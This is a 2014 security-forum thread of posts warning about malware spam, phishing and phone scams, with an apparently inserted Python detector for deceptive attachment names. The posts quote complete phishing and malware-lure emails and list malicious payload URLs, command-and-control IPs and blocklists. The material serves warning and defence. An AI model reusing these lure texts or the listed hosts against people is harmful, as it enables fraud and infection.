From:     Geir Myklebust (DHL NO) [Geir.Myklebust@ dhl .com]
Date:     10 September 2014 10:35
Subject:     FW: customer acct. no.: 4690086 - invoice 0257241 needs to be paid
Dear Sir.
The attached invoice from Villmarksmessen 2014 has still not been settled.
Please advise as soon as possible.
Thank you and regards,
Geir
Med vennlig hilsen/ Kind Regards
Geir Myklebust
Product Manager, Avd. Trade Fairs & Events
DHL Global Forwarding (Norway) AS
Avd. Trade Fairs & Events
Messeveien 14
2004 Lillestrøm ...


Attached is a ZIP file of various different names (e.g. invoice_0257241.zip), containing a malicious executable file invoice_3466198.exe which has a VirusTotal detection rate of 3/54*. The Comodo CAMAS report** shows an attempted connection to voladora .com/Imagenes/qaws.cab which is currently coming up with a socket error. I would recommend that you block access to that domain. Further analysis is pending..."
* https://www.virustot...sis/1410342283/

** http://camas.comodo....da704a26cac5038

"UPDATE: a second malicious binary is doing the rounds, this time with a detection rate of 2/53***..."
*** https://www.virustot...sis/1410353017/

92.43.17.6: https://www.virustot....6/information/

- http://myonlinesecur...ke-pdf-malware/
10 Sep 2014
- https://www.virustot...sis/1410350810/
___

Fake Overdue invoice SPAM – doc malware
- http://myonlinesecur...ke-doc-malware/
10 Sep 2014 - "'Overdue invoice #1197419584' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    Good afternoon,
    I was hoping to hear from you by now. May I have payment on invoice #1197419584 today please, or would you like a further extension?
    Best regards,
    Cherish Schaunaman
    +07540 61 15 69

... or like this one:
    This email contains an invoice file in attachment.

10 September 2014 : bill_2014-09-10_09-16-23_1197419584.arj :
Extracts to:  bill_2014-09-10_09-16-23_1197419584.exe
Current Virus total detections: 6/55*
Alternative version 10 September 2014 : Invoice4777_2C7.zip :
Extracts to: attachment_scaned.doc            .exe
Current Virus total detections: 2/54**
This 'Overdue invoice #1197419584' is another one of the spoofed icon files that unless you have “show known file extensions” enabled, will look like a proper Microsoft Word .doc file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1410342531/

** https://www.virustot...sis/1410341816/
___

'Outstanding Warrant' Phone SCAMS
- http://www.hoax-slay...one-scams.shtml
Sep 10, 2014 - "Scammers posing as law-enforcement officers are cold-calling people and tricking them into paying over the phone to resolve supposedly outstanding warrants. The scammers warn victims that, if they don't pay the requested fee, police may come to their home and arrest them... The scammers are reportedly quite skilled at impersonating police officers and are often able to convince victims that they are legitimate. When victims call back on the number provided, the scammers may identify their 'office' as a seemingly legitimate entity such as the 'County Warrants Department'. This simple -ruse- may further convince victims that the scammer's claims are true... This type of -scam- is certainly nothing new and has been around in various forms for many years... a flurry of reports from several US states suggests that these scammers are currently quite active. The scammers are also using variations of the old jury duty phone scam to steal money from victims. Police will -never- call you and demand an immediate payment to resolve an outstanding warrant. If you receive such a suspect call, do -not- give the caller any personal and financial information and do -not- comply with their instructions. If in doubt, call your local police to check. Do -not- use a phone number provided by the caller. Find a number for police in a local phone directory..."
___

Malvertisements - YouTube, Amazon and Yahoo
- http://www.computerw...-and-yahoo.html
Sep 9, 2014 - "Malicious advertisements have popped up on websites such as YouTube, Amazon and Yahoo, part of a sophisticated campaign to spread malware, Cisco said*... When encountered, the malicious advertisements cause the user to be -redirected- to a different website, which triggers a download based on whether the computer is running Windows or Apple's OS X... Cisco didn't identify the advertising network that is serving the malicious advertisements. Although ad networks try to filter out malicious ones, occasionally bad ones slip in, which for a high-traffic site means a large pool of potential victims...  Some of the malicious ads were served on youtube.com, amazon.com and ads.yahoo.com, Pelkmann wrote. All told, 74 domains were serving the ads. When a victim is -redirected- by one of the ads, the computer downloads a piece of malware with a unique checksum, making it harder for security software to detect. The download may also contain legitimate software such as a media player. To be infected, the user must be convinced to open the file. 'The attackers are purely relying on social engineering techniques in order to get the user to install the software package,' Pelkmann wrote. 'No drive-by exploits are being used thus far'..."
* http://blogs.cisco.c.../kyle-and-stan/
 



Edited by AplusWebMaster, 10 September 2014 - 10:15 AM.



#1276 AplusWebMaster

Posted 11 September 2014 - 06:49 AM

FYI...

Fake job offer SPAM - llcinc .net
- http://blog.dynamoo....-job-offer.html
11 Sep 2014 - "This -fake- company's name looks like it has been designed to be hard to find on Google. The so-called LLC INC using the domain llcinc .net does -not- exist.
    Date:      Wed, 10 Sep 2014 19:51:50 -0400 [09/10/14 19:51:50 EDT]
    From:      LLC INC
    Reply-To:      recruiter@ llcinc .net
    Subject:      EMPLOYMENT OFFER
    Hello,
      Good day to you overthere we will like to inform you that our company is currently
    opening an opportunity for employment if you are interested please do reply with your resume
    to recruiter@ llcinc .net
    Thanks
    Management LLC INC


This so-called job is going to be something like a money mule, parcel mule or some other illegal activity. The domain llcinc .net was registered just a few days ago with -fake- details... There is no website. The email originates from 209.169.222.37, the mail headers indicate that this is probably a compromised email server mail .swsymphony .org.
Avoid."
___

Fake eFax SPAM leads to Cryptowall
- http://blog.dynamoo....cryptowall.html
11 Sep 2014 - "Yet another -fake- eFax spam. I mean really I cannot remember the last time someone sent me a (real) fax...
From:     eFax [message@ inbound .efax .com]
Date:     11 September 2014 20:35
Subject:     eFax message from "unknown" - 1 page(s), Caller-ID: 1-865-537-8935
Fax Message [Caller-ID: 1-865-537-8935
You have received a 1 page fax at Fri, 12 Sep 2014 02:35:44 +0700.
* The reference number for this fax is atl_did1-1400166434-52051792384-154.
Click here to view this fax using your PDF reader.
Please visit www .eFax .com/en/efax/twa/page/help if you have any questions regarding this message or your service.
Thank you for using the eFax service! ...


... the link in the message goes somewhere bad, in this case it downloads a ZIP file from cybercity-game .com/game/Documents.zip which unzips to a malicious executable Documents.scr which has a pretty low VirusTotal detection rate of 2/55*. The ThreatTrack report** clearly identifies this as Cryptowall and identifies that it either downloads data from or posts data... The 111.exe has a much wider detection rate of 22/53*** and according to the ThreatTrack analysis of that binary there is some sort of network connection... I would recommend blocking the following:
188.165.204.210
193.19.184.20
193.169.86.151
goodbookideas .com
mtsvp .com
suspendedwar .com
"
* https://www.virustot...sis/1410467960/

** http://www.dynamoo.c...20a381ad91f.pdf

*** https://www.virustot...sis/1410468901/
___

Malicious WordPress injection sending to 178.62.254.78 and 176.58.100.98
- http://blog.dynamoo....on-sending.html
11 Sep 2014 - "There is currently some sort of injection attack against WordPress sites that is injecting code into the site's .js files. Not so unusual.. except that the payload site in the file changes every half hour or so... The site mentioned in the IFRAME is the one that keeps -changing- so presumably there is either something running on the compromised WordPress site, or there is some other mechanism for the bad guys to update the details... All these subdomains are hijacked from legitimate domains using AFRAID .ORG nameservers, and are hosted on 178.62.254.78 (Digital Ocean, Netherlands). These then pass the victim onto another domain in the format... blocking the following IPs may give you better protection:
176.58.100.98
178.62.254.78
"

176.58.100.98: https://www.virustot...98/information/

178.62.254.78: https://www.virustot...78/information/
___

Fake Employee Important Address UPDATE/SPAM – PDF malware
- http://myonlinesecur...ke-pdf-malware/
11 Sep 2014 - "'To All Employee’s –  Important Address UPDATE' which pretends to come from Administrator at your own domain is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
     To All Employee’s:
    The end of the year is approaching and we want to ensure every employee receives their W-0 to the correct address. Verify that the address is correct – https://local.thespy...x?id=1206922112 If changes need to be made, contact HR .. Administrator ...


11 September 2014: Documents.zip: Extracts to: Documents.scr
Current Virus total detections: 0/53* ... another one of the spoofed icon files that unless you have “show known file extensions” enabled, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1410456657/

- http://blog.dynamoo....nt-address.html
11 Sep 2014 - "This -fake- HR spam leads to a malicious ZIP file:
From:     Administrator [administrator@ victimdomain .com]
    Date:     11 September 2014 22:25
    Subject:     To All Employee's - Important Address UPDATE
    To All Employee's:The end of the year is approaching and we want to ensure every employee receives their W-5 to the correct address. Verify that the address is correct... If changes need to be made, contact HR...


The link in the email goes to the same site as described in this earlier post*, which means that the payload is Cryptowall."
* http://blog.dynamoo....cryptowall.html
___

Fake picture or video SPAM – jpg malware
- http://myonlinesecur...ke-jpg-malware/
11 Sep 2014 - "'A new picture or video' message pretending to come from getmyphoto@ vodafone .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The attachment file names are so far all the same and it extracts to a fake Windows shortcut file .pif. Even setting show file extensions will not show the .pif extension in Windows 8, and the unzipped file will look like a genuine Windows shortcut, so you need to be especially wary and cautious. See below:
> http://myonlinesecur...not-showing.png
The email looks like:
    You have received a picture message from mobile phone number +447586595142 picture
    Please note, the free reply expires three days after the original message is sent from the Vodafone network. Vodafone Service


There is a second version of this email doing the rounds today. Instead of an attachment it has a link to a compromised/ infected/newly created malware pushing site where it automatically tries to download the malware in a zip file.
You have received a picture message from mobile phone number +447557523496 click here to view picture message
Please note, the free reply expires three days after the original message is sent from the Vodafone network. Vodafone Service


... there will be hundreds of different sites. The zip was 90837744-2014_481427.zip which extracts to 90837744-2014_481427.scr which has the same # and detection rate as the pif file earlier submitted to virus total*

11 September 2014: IMG_00005_09112014.jpeg.zip : Extracts to:    IMG_00005_09112014.jpeg.pif
Current Virus total detections: 4/53**. This is another one of the spoofed icon files that unless you have “show known file extensions” enabled, will look like a proper jpg file instead of the .pif (Windows shortcut) file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1410430034/

** https://www.virustot...sis/1410427007/
___

Fake 'new order' SPAM – PDF malware
- http://myonlinesecur...ke-pdf-malware/
11 Sep 2014 - "'new order' pretending to come from random names at live .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email has various subjects, including new order, new invoice, FWD:invoice, FWD Order... The attachment file names are so far all the same and it extracts to a -fake- Windows shortcut file .pif. Even setting show file extensions will -not- show the .pif extension in Windows 8, and the unzipped file will look like a genuine Windows shortcut, so you need to be especially wary and cautious. See below:
> http://myonlinesecur...not-showing.png
The email looks like:
Warmest regards,
> http://myonlinesecur...9/new-order.png


11 September 2014: 2014.09.11.zip : Extracts to:    2014.09.11.pdf.pif
Current Virus total detections: 4/53*. This is another one of the spoofed icon files that unless you have “show known file extensions” enabled, will look like a proper PDF file instead of the .pif (Windows shortcut) file it really is, so making it much more likely for you to accidentally open it and be infected... The basic rule is NEVER open any attachment to an email, unless you are expecting it... Never just blindly click on the file in your email..."
* https://www.virustot...sis/1410427007/
 



Edited by AplusWebMaster, 11 September 2014 - 09:26 PM.



#1277 AplusWebMaster

Posted 12 September 2014 - 04:03 AM

FYI...

Fake Invoice SPAM - contains malicious VBS script
- http://blog.mxlab.eu...ous-vbs-script/
Sep 12, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “[COPIE FACTURE SOCIETE LWS FC-408185] – [LWS INVOICE] 10/09/2014″. This email is sent from the spoofed address “Service clients LWS <noreply@ lws .com>” and has the following body:
S.A.R.L LWS
4, rue galvani
75838 PARIS Cedex 17
Paris le, 10/09/2014
Veuillez trouver en pièce jointe votre facture de référence: facture FC-408185 (Fichier: facture-408185) au format ZIP.
Si vous n’avez pas WinRar (Logiciel permettant de lire les fichiers ZIP) vous pouvez le télécharger ici:
http ://www .rarlab .com/download.htm
Merci pour la confiance que vous nous accordez,
Le service comptabilité LWS ...


The attached ZIP file has the name FACTURE_45871147.zip and contains the 4 kB large file FACTURE_45871147.vbs. The VBS script is in fact encoded to hide its real purpose, but it seems that this script will download other malicious files and will install them on a system in order to infect the computer. The trojan is known as Trojan.Script.Crypt.deehcf or VBS/Dloadr-DVY. At the time of writing, 2 of the 53* AV engines did detect the trojan at Virus Total..."
* https://www.virustot...196a5/analysis/
___

Fake Household Improvement SPAM - Zbot Malware
- https://blog.malware...h-zbot-malware/
Sep 12, 2014 - "... malicious email in circulation at the moment which claims to contain an invoice from a Kitchen Appliance company. According to another recipient of the mail*, the named company is actually a real business entity although there’s no suggestion that they’ve been hacked or otherwise compromised – it seems the scammers just opened up a directory, said “That one” and just started pretending to be them. The mail reads as follows:
Screenshot: https://blog.malware...9/kitchens1.jpg
... The email comes with a .zip attachment, which contains a piece of Malware known as Zbot.  Zeus (aka Zbot) is something to be avoided, as it can lead to banking password theft, form grabbing, keystroke logging and also Ransomware. The zip contains an executable made to look like a Word .doc file, which is a trick as old as the hills yet extremely effective where catching people out is concerned. Telling Windows to display known file extensions will help to avoid this particular pitfall... we detect this as Trojan.Spy.Zbot, and the current Virus Total scores currently clock in at 29/54**...  there’s another mail*** doing the rounds which spoofs the same email address mentioned above, yet claims to be sent from a toiletries company. If you’ve bought any form of kitchen / household upgrade or addition recently and receive mails with zipped invoices, you may not recall exactly who you bought all of your items from. With that in mind, you may wish to have a look at your receipts and bank statements, and – on the off chance the randomly selected company named in the spam mails matches up – give them a call directly to confirm they really did send you something. There’s a good chance they probably didn’t..."
* http://myonlinesecur...rd-doc-malware/

** https://www.virustot...14f73/analysis/

*** http://blog.mxlab.eu...ontains-trojan/
___

Data Breaches and PoS RAM Scrapers
- http://blog.trendmic...s-ram-scrapers/
Sep 11, 2014 - "... Ever since the Target data breach came into the limelight, there has been a constant stream of merchants/retailers publicly disclosing data breach incidents. These data breaches typically involve credit card data theft using PoS RAM scrapers. Early this month, Brian Krebs reported yet another big data breach that involves U.S. retailer Home Depot using a new variant of the BlackPOS PoS RAM scraper. Nearly all Home Depot locations in the US are believed to have been affected and it is speculated this data breach might surpass the Target breach in terms of volume of data stolen. In addition to an increased number of data breaches, 2014 also brings an increase in the number of new PoS RAM scraper families. Our PoS RAM scraper family tree illustrates the evolution as follows:
Evolution of the PoS RAM scraper family
> http://blog.trendmic...Figure-3-01.png
... Of the six new variants discovered in 2014, four were discovered between June and August.
- Soraya – discovered in June and is a Dexter- and ZeuS-inspired malware. In addition to scraping RAM for credit card Tracks 1 and 2 data, it borrows tricks from ZeuS for hooking the NtResumeThread API, and injects itself into all new processes. It also borrows ZeuS’s form-grabbing functionality and hooks the browser’s HTTP POST function. Trend Micro detects Soraya variants as TSPY_SORAYA.A.
- BrutPOS – discovered in July and appears to have borrowed functionality from a BlackPOS variant. It attempts to exploit PoS systems that use weak or default passwords and have open Remote Desktop Protocol (RDP) ports. BrutPOS will brute-force the login:password combinations to gain entry into the system. Trend Micro detects BrutPOS variants as TROJ_TIBRUN.B and TROJ_TIBRUN.SM.
- Backoff – discovered in July, is a successor of Alina. It implements an updated data search function and drops a watchdog process that ensures Backoff is always running on the system. The cybercriminals use publicly available tools to brute-force entry into RDP applications on PoS systems and install Backoff. Trend Micro detects Backoff variants as TSPY_POSLOGR.A, TSPY_POSLOGR.B, and TSPY_POSLOGR.C.
- BlackPOS ver 2.0 – discovered in August, clones the exfiltration technique that the BlackPOS variant used to compromise U.S. retailer Target. BlackPOS ver 2.0 also adds a unique feature where it pretends to be an AV product installed on the system to avoid drawing unwanted attention to itself. Reports indicate that this malware appears to have been used in the latest big data breach targeting Home Depot. Trend Micro detects BlackPOS ver 2.0 variants as TSPY_MEMLOG.A..."
 



Edited by AplusWebMaster, 12 September 2014 - 09:41 AM.

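The attachment names quoted in the items above share a few tricks: a document extension placed in front of the real .scr, .exe or .pif extension, spaces padding out the name so the real extension scrolls out of view (attachment_scaned.doc            .exe), and the .pif extension that Windows 8 hides even with known extensions shown. The Python below is an added example for this thread, not code from any of the quoted blogs; it turns those observations into a mail-gateway check, and the extension lists and the in-memory sample ZIP are my own constructed assumptions.

```python
"""Flag email attachments that use the naming tricks described in the spam
reports above: a document extension in front of a real executable extension
(invoice.pdf.scr, Complaint.docx.exe), whitespace padding between the two
(attachment_scaned.doc            .exe), the .pif extension that Explorer hides
even when known extensions are shown, and ARJ containers.
Added example for this thread; the lists below are assumptions, not a vendor list."""

import io
import zipfile
from dataclasses import dataclass, field
from typing import List, Optional

# Extensions Windows executes on double-click (assumption: a practical subset).
EXECUTABLE_EXTS = {"exe", "scr", "pif", "com", "bat", "cmd", "vbs", "js", "jse", "wsf"}
# Document/image extensions the reports show being spoofed by name and icon.
DOCUMENT_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "jpg", "jpeg", "png", "txt", "rtf"}


@dataclass
class Finding:
    """One suspicious file name and the reasons it was flagged."""
    name: str
    reasons: List[str] = field(default_factory=list)


def inspect_name(name: str) -> List[str]:
    """Return the reasons a single file name looks deceptive; empty list if it looks clean."""
    reasons: List[str] = []
    base = name.rsplit("/", 1)[-1].lower()      # ZIP members may carry a folder prefix
    parts = base.split(".")
    if len(parts) < 2:
        return reasons                          # no extension at all
    final_ext = parts[-1].strip()
    if final_ext in EXECUTABLE_EXTS:
        reasons.append(f"executable extension .{final_ext}")
        if final_ext == "pif":
            reasons.append("explorer hides .pif even with known extensions shown")
        # Any document extension earlier in the name means it is posing as a document.
        inner_docs = [p.strip() for p in parts[1:-1] if p.strip() in DOCUMENT_EXTS]
        if inner_docs:
            reasons.append(f"document extension .{inner_docs[-1]} before the real one")
        # Trailing spaces on the segment before the real extension push it out of view.
        if parts[-2] != parts[-2].rstrip():
            reasons.append("whitespace padding hides the real extension")
    elif final_ext == "arj":
        reasons.append("arj archive (not used by legitimate senders per the reports)")
    return reasons


def inspect_zip(data: bytes) -> List[Finding]:
    """Inspect every file inside an in-memory ZIP attachment."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            reasons = inspect_name(info.filename)
            if reasons:
                findings.append(Finding(info.filename, reasons))
    return findings


def inspect_attachment(filename: str, data: Optional[bytes] = None) -> List[Finding]:
    """Check the attachment's own name, then its members when it is a readable ZIP."""
    findings = []
    outer = inspect_name(filename)
    if outer:
        findings.append(Finding(filename, outer))
    if data is not None and zipfile.is_zipfile(io.BytesIO(data)):
        findings.extend(inspect_zip(data))
    return findings


def build_sample_zip(members: dict) -> bytes:
    """Constructed fixture: a ZIP whose member names mimic the reported attachments."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed sample based on the names quoted in the reports; contents are dummy bytes.
SAMPLE_MEMBERS = {
    "invoice_090914.scr": b"dummy",
    "Copy of original Complaint at Tribunal.docx.exe": b"dummy",
    "attachment_scaned.doc            .exe": b"dummy",
    "IMG_00005_09112014.jpeg.pif": b"dummy",
    "readme.txt": b"dummy",
}


if __name__ == "__main__":
    for f in inspect_attachment("Documents.zip", build_sample_zip(SAMPLE_MEMBERS)):
        print(f"{f.name!r}: {'; '.join(f.reasons)}")
    for f in inspect_attachment("disturbance_2014-09-15_08-38-12_33205939124.arj"):
        print(f"{f.name!r}: {'; '.join(f.reasons)}")
```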


#1278 AplusWebMaster

Posted 14 September 2014 - 07:39 PM

FYI...

Phish - Paypal ...
- http://myonlinesecur...-hear-phishing/
14 Sep 2014 - "'Paypal Your account will be limited until we hear from you' pretending to come from service_paypal=cczazmam .com@ wpengine .com; on behalf of; service_paypal@ cczazmam .com. There are a few major common subjects in a phishing attempt. The majority are either PayPal or your Bank or Credit Card... The original email looks like this. It will NEVER be a genuine email from  PayPal or Your Bank so don’t ever follow the links in the email...
    PayPal account information :
    Hello,
    Dear PayPal user ,
    Your account will be limited if you not confirm it .
    Need Assistance?
    Some information on your account appears to be missing or incorrect.
    Please update your account promptly so that you can continue to enjoy
    all the benefits of your PayPal account.
    If you don’t update your account within 37 days, we’ll limit what you can do with your PayPal account.
    Please Login to confirm your information :
    http ://rangeviewrentals .com//wp-content/themes/twentytwelve/wester.html
    Reference Number: PP-003-211-347-423
    Yours sincerely,
    PayPal


This particular phishing campaign starts with an email with a link. In this case to a hacked compromised website, which looks nothing like any genuine PayPal page:
> http://myonlinesecur...ishing-scam.png
This one wants your personal details, your Paypal account log in details and your credit card and bank details and your email log in details . Many of them are also designed to specifically steal your facebook and other social network log in details..."
 



Edited by AplusWebMaster, 14 September 2014 - 07:40 PM.



#1279 AplusWebMaster

Posted 15 September 2014 - 05:07 AM

FYI...

Fake Termination SPAM – malware
- http://myonlinesecur...lation-malware/
15 Sep 2014 - "There can’t be a much more alarming email to open first thing on a Monday morning than one that pretends to say that you have been fired... 'Termination due to policy violation #33205939124' pretending to come from random names at random companies is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Today’s email template attaches an arj file. This sort of compressed file is rarely used nowadays and many popular zip file programs will not automatically extract them. -Any- email received with an ARJ attachment should be immediately -deleted-. NO legitimate company or program ever uses that form of compression nowadays. To make it even harder to quickly detect, all the attachments are randomly named and extract to a different randomly named file and each one has a totally different SHA1 or MD5 #. Loads of slightly different subjects with this one, including
    Policy violation #59892665326
    Termination due to policy violation #33205939124
    Termination #59147901198
All the alleged infringements or violations have different numbers... The email looks like:
     Hello,
    We regret to inform you that your employment with A&M Defence & Marine Services Ltd is being terminated. Your termination is the result of the following violations of company policy:
    - 0A4 44 12.09.2011
    - 0A4 46 12.09.2011
    - 0A4 85 12.09.2011
     You were issued written warnings on 19.08.2014. As stated in your final warning, you needed to take steps to correct your behavior by 15.09.2014. Your failure to do so has resulted in your termination. To appeal this termination, you must return written notification of your intention to appeal to Wynona Kinnare in A&M Defence & Marine Services Ltd no later than 06:00PM on 21.09.2014.
     Sincerely,
    Pauletta Stephens ...


15 September 2014: disturbance_2014-09-15_08-38-12_33205939124.arj:
Extracts to:  disturbance_2014-09-15_08-38-12_33205939124.exe
Current Virus total detections: 3/53*. This 'Termination due to policy violation #33205939124' is another one of the spoofed icon files that unless you have “show known file extensions” enabled, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...4c4ef/analysis/
... Behavioural information
TCP connections:
187.45.193.139: https://www.virustot...39/information/
213.186.33.87: https://www.virustot...87/information/
23.62.99.33: https://www.virustot...33/information/
66.96.147.117: https://www.virustot...17/information/
UDP communications:
137.170.185.211: https://www.virustot...11/information/
___

LinkedIn feature exposes Email Addresses
- http://krebsonsecuri...mail-addresses/
Sep 15, 2014 - "One of the risks of using social media networks is having information you intend to share with only a handful of friends be made available to everyone. Sometimes that over-sharing happens because friends betray your trust, but more worrisome are the cases in which a social media platform itself exposes your data in the name of marketing... According to researchers at the Seattle, Wash.-based firm Rhino Security Labs, at the crux of the issue is LinkedIn’s penchant for making sure you’re as connected as you possibly can be. When you sign up for a new account, for example, the service asks if you’d like to check your contacts lists at other online services (such as Gmail, Yahoo, Hotmail, etc.). The service does this so that you can connect with any email contacts that are already on LinkedIn, and so that LinkedIn can send invitations to your contacts who aren’t already users... Rhino Security founders Benjamin Caudill and Bryan Seely have a recent history of revealing how trust relationships between and among online services can be abused to expose or divert potentially sensitive information... In an email sent to this reporter last week, LinkedIn said it was planning at least two changes to the way its service handles user email addresses..."
(More at the krebsonsecurity URL above.)
___

Fake Overdue invoice SPAM - malicious .arj attachment  
- http://blog.dynamoo....0-spam-has.html
15 Sep 2014 - "This -fake- invoice email has a malicious attachment:
    From:     Mauro Reddin
    Date:     15 September 2014 10:32
    Subject:     Overdue invoice #6767390
    Morning,
    I was hoping to hear from you by now. May I have payment on invoice #84819995669 today please, or would you like a further extension?
    Best regards,
    Mauro Reddin ...


The attachment is an archive file invc_2014-09-15_15-07-11_6767390.arj so in order to get infected you would need an application capable of handling ARJ archives. Once unpacked, there is a malicious executable called invc_2014-09-15_15-07-11_88499270.exe which has a VirusTotal detection rate of just 1/55*... recommend that you apply the following blocklist (Long list at the dynamoo URL above.) ..."
* https://www.virustot...sis/1410773681/
___

Fake Sage 'Outdated Invoice' SPAM ...
- http://blog.dynamoo....ce-spam_15.html
15 Sep 2014 - "... another -fake- Sage email leading to malware:

Screenshot: http://4.bp.blogspot.../s1600/sage.png

... This ZIP file contains a malicious executable Invoice18642.scr which has a VirusTotal detection rate of just 1/55*. The ThreatTrack report... shows that it attempts to communicate with the following resources:
188.165.204.210/1509uk1/NODE01/0/51-SP3/0/
188.165.204.210/1509uk1/NODE01/1/0/0/
green-fuel .us/upload/box/1509uk1.ltc
www .green-fuel .us/upload/box/1509uk1.ltc
Recommended blocklist:
188.165.204.210
green-fuel .us
petitepanda .net
florensegoethe .com.br
coursstagephoto .com
vicklovesmila .com
flashsavant .com
"
* https://www.virustot...sis/1410779812/
___

Fake 'secure' NatWest SPAM – PDF malware
- http://myonlinesecur...ke-pdf-malware/
15 Sep 2014 - "'You have received a new secure message from NatWest' pretending to come from NatWest <secure@natwest.com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
[ NatWest logo ]
You have a new private message from NatWest
To view/read this your secure message please click here
Email Encryption Provided by NatWest. Learn More.
Email Security Powered by Voltage IBE
Copyright 2014 National Westminster Bank Plc. All rights reserved.
Footer Logo NatWest
To unsubscribe please click here ...

    
15 September 2014: SecureMessage.zip (8kb): Extracts to: SecureMessage.scr
Current Virus total detections: 1/55*. This 'You have received a new secure message from NatWest' is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1410779812/

- http://threattrack.t...re-message-spam
Sep 15, 2014
Screenshot: https://gs1.wac.edge...Zu2c1r6pupn.png
___

Phish - LLoyds 'Secure' SPAM...
- http://myonlinesecur...ssage-phishing/
15 Sep 2014 - "There are a few major common subjects in a phishing attempt. The majority are either PayPal or your Bank or Credit Card, with a message saying something like:
- There have been unauthorised or suspicious attempts to log in to your account, please verify
- Your account has exceeded its limit and needs to be verified
- Your account will be suspended !
- You have received a secure message from < your bank>
- New Secure Message
- We are unable to verify your account information
- Update Personal Information
- Urgent Account Review Notification
- We recently noticed one or more attempts to log in to your PayPal account  from a foreign IP address
- Confirmation of Order
This one is 'LLoyds bank New Secure Message' pretending to come from Eli.Ray@ lloydsbank .com or David.Ricard@ lloydsbank .com... Email looks like:
[ Lloyds TSB logo ]     
    (New users may need to verify their email address)
    If you do not see or cannot click “Read Message” / click here
    Desktop Users:
    You will be prompted to open (view) the file or save (download) it to your computer. For best results, click Read Message button.
    Mobile Users:
    Install the mobile application.
    Protected by the Voltage SecureMail Cloud
    SecureMail has a NEW LOOK to better support mobile devices!
    Disclaimer: This email and any attachments are confidential and for the sole use of the recipients. If you have received this email in error please notify the sender...


Screenshot: http://myonlinesecur...ure_message.png

This one wants your personal details and bank details..."
___

Fake Fax SPAM - malware attachment
- http://myonlinesecur...ke-pdf-malware/
15 Sep 2014 - "'You have received a fax' pretending to come from fax .co.uk <fax@ documents55 .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    You have received a new fax. This fax was received by Fax Server.
    The fax has been downloaded to dropbox service (Google Inc).
    To view your fax message, please download from the link below. It’s
    operated by Dropbox and safety...
    Received Fax Details
    Received on:1 5/09/2014 10:14 AM
    Number of Pages: 1 ...


15 September 2014: Docs0972.zip (8kb): Extracts to: Docs0972.scr
Current Virus total detections: 0/54*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1410804563/
___

Twitch users shook by money spending malware
- http://www.theinquir...pending-malware
15 Sep 2014 - "... F-Secure has warned gamers that the Twitch video streaming service has been hit with malware that can spend users' money. The firm revealed its concerns in a blog post on Friday*, shining a dark light on the new gaming console darling and its role in the world of Steam. F-Secure said that an alarmed Twitch user - not Amazon - approached it with some concerns, explaining that a lure in the Twitch chat feature offers access to a raffle. We all know what can and usually does follow clicking an unsolicited link, and that is the start of a one-way trip to malware. This link, which purports to offer gaming gewgaws, is yet another lie, said F-Secure. It explained that a "Twitch-bot" account "bombards" the chat feature and tickles users with its lure..."
More detail here:
* http://www.f-secure....s/00002742.html

... and here:
- http://www.spywarein...steam-accounts/
 

:ph34r:  :grrr:


Edited by AplusWebMaster, 15 September 2014 - 03:39 PM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#1280 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,071 posts

Posted 16 September 2014 - 04:09 AM

FYI...

Fake 'Payments' SPAM ...
- http://blog.mxlab.eu...rding-payments/
Sep 16, 2014 - "... intercepted different campaigns where the trojan Gen:Variant.Graftor.155439 is present in the attached ZIP archive. The trojan is known as Gen:Variant.Graftor.155439 by most AV engines but it’s also known as Trojan/Win32.Zbot, HW32.Paked.1F59, Generic-FAUS!BA7599C952BE or PE:Malware.XPACK-HIE/Heur!1.9C48. The first email comes with the subject “Re: today payment done”, is sent from a spoofed address and has the following body:
    Dear sir,
    Today we have able to remit the total amount of US$ 51,704.97 to your account. Details of our payments are as follows:
    Cont. #41 SPV001/APR/13 US$34,299.13 – 11,748.82 (50% disc. For R008 & R016) =
    Cont. #42 EXSQI013/MAY/13 US$29,154.66
    Total Remittance: US$ 51,704.97
    Attached is the TT copy, check with your bank and let us know when you will proceed with shipment.
    Thank you very much.
    Best regards,
    Me


The attached ZIP file has the name swift copy.zip and contains the swift copy.scr file. At the time of writing, 11 of the 54 AV engines did detect the trojan at Virus Total*...
* https://www.virustot...6c686/analysis/
The second email comes with the subject “Re: Balance payment”, is sent from a spoofed address and has the following body:
    The attached TT copy is issued at the request of our customer. The advice is for your reference only.
    Yours faithfully,
